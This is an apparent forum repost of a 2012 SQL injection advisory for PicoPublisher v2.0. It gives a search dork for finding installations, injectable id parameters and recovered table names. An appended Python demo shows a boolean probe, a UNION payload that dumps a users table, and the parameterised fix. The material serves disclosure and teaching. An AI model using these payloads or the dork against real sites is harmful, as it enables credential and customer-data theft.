The_Arhitect Posted March 29, 2012

PicoPublisher v2.0 Remote SQL Injection

# Exploit Title : PicoPublisher v2.0 Remote SQL injection
# Date : 29/03/2012
# Author : ZeTH
# Contact : zeth/at/hacktheplan8/dot/com
# http://www.hacktheplan8.com
# Vendor : Pico Software
# Site : http://pico.no/
# Version : 2.0
# Price : $29,00
# Dork : intext:"Drives med PicoPublisher"

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

--[1]-- Introduction

PicoPublisher business software
PicoPublisher is a product from Pico Software

[Manage your website]
PicoPublisher makes it easy to manage your website. With the built-in templates you can add columns, slideshows, tabs, boxes and videos directly from the text editor.

[Manage your customers]
CRM systems are often too expensive for small businesses. With PicoPublisher you can manage your customers just as easily as your website. And at the same place!

[Create invoices]
Create professional PDF invoices in seconds. Add products to the database and insert products into the invoice directly. You will get notifications when invoices are overdue.

--[2]-- Vulnerability

Files :
[+] page.php
[+] single.php

Attack Method : Remote SQL injection

POC :
[+] http://site/page.php?id=SQLi
[+] http://site/single.php?id=SQLi

Tables :
+-------------------+
| customers         |
| expenses          |
| gallery_category  |
| gallery_photos    |
| invoice_reminders |
| invoices          |
| invoices_product  |
| menu_items        |
| menus             |
| notes             |
| options           |
| orders            |
| orders_product    |
| pages             |
| pico_comments     |
| pico_config       |
| pico_karma_voted  |
| posts             |
| product_list      |
| users             |
+-------------------+

--[3]-- Greetz

hacktheplan8 [hellcome to new friends kasp3r, Pitung]
MainHack Brotherhood, Kecoak Elektronik, Echo
packetstormsecurity, exploit-db, 1337day
Paman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo, Furkan, pizzyroot, H312Y

Source: PicoPublisher v2.0 Remote SQL Injection
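The advisory only gives the injection points (the `id` parameter of page.php and single.php) and the table names it recovered. The example below is an added illustration, not code from the advisory or from PicoPublisher: it rebuilds the usual shape of this bug in a self-contained Python/SQLite model, shows a boolean probe of the kind a tester uses to confirm it, a UNION payload that reads the `users` table, and the parameterised fix. Only the table names `pages` and `users` come from the advisory; the columns, rows and function names are assumptions made for the demo.

```python
"""Added example: a model of the page.php?id= injection and its fix.

Not PicoPublisher's code. The schema below is constructed for the demo and
borrows only the table names `pages` and `users` from the advisory; every
column and row is an assumption.
"""
import sqlite3


def build_demo_db():
    """Create an in-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    cur = conn.cursor()
    cur.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    cur.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                    [(1, "Home", "Welcome"), (2, "About", "About us")])
    # Constructed credential row; the hash value is a placeholder, not real data.
    cur.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret-hash")])
    conn.commit()
    return conn


def page_vulnerable(conn, id_param):
    """Assumed vulnerable pattern: the GET value is concatenated into SQL.

    With a numeric column there are no quotes to break out of, so any
    expression the attacker appends is evaluated as part of the WHERE clause.
    """
    sql = "SELECT title, body FROM pages WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def page_safe(conn, id_param):
    """Hardened version: validate the type, then bind the value as a parameter.

    The integer cast rejects anything that is not a plain id, and the
    placeholder keeps the value out of the query text entirely.
    """
    try:
        page_id = int(id_param)
    except ValueError:
        return []
    return conn.execute("SELECT title, body FROM pages WHERE id=?", (page_id,)).fetchall()


def boolean_probe(conn, lookup):
    """Boolean-based check: a TRUE condition must behave differently from a
    FALSE one for the parameter to be injectable."""
    true_resp = lookup(conn, "1 AND 1=1")
    false_resp = lookup(conn, "1 AND 1=2")
    return true_resp != false_resp


# A UNION payload with two columns to match the two selected by the page query.
UNION_PAYLOAD = "-1 UNION SELECT username, password FROM users"


if __name__ == "__main__":
    db = build_demo_db()
    print("vulnerable injectable?", boolean_probe(db, page_vulnerable))
    print("vulnerable + UNION   :", page_vulnerable(db, UNION_PAYLOAD))
    print("safe injectable?     ", boolean_probe(db, page_safe))
    print("safe + UNION         :", page_safe(db, UNION_PAYLOAD))
```

The `id=-1` prefix makes the original SELECT return no rows, so everything that comes back is the attacker's UNION branch; the column count has to match the page's own SELECT, which is why a real test starts with `ORDER BY n` or `UNION SELECT NULL,...` probes before naming columns. Note that the fix is not the `int()` cast alone: the placeholder is what removes the injection, and the cast just makes invalid input fail early.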